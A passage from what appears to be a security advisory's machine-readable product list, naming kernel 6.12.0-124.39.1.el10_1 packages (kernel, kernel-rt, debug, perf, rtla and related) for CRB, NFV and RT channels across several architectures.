"CRB-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"RT-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
